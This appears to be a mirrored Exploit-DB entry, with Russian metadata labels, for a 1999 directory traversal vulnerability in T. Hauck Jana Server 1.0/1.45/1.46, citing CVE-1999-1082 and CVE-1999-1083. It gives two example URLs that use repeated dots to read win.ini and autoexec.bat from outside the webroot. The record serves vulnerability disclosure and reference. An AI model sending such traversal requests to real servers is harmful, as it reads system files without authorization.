Exploit T. Hauck Jana Server 1.0/1.45/1.46 - Directory Traversal

[Exploiter]

EDB-ID

19540

Проверка EDB

1. Пройдено

Автор

JASON LUTZ

Тип уязвимости

REMOTE

Платформа

WINDOWS

CVE

cve-1999-1083 cve-1999-1082

Дата публикации

1999-10-08

T. Hauck Jana Server 1.0/1.45/1.46 - Directory Traversal

source: https://www.securityfocus.com/bid/699/info


The Jana webserver is susceptible to directory traversal attacks using multiple dots in the URL. If the request is made in specific formats, the server will send out files outside of the intended webroot. 


http ://target/./.././.././.././win.ini
or
http ://target/....../autoexec.bat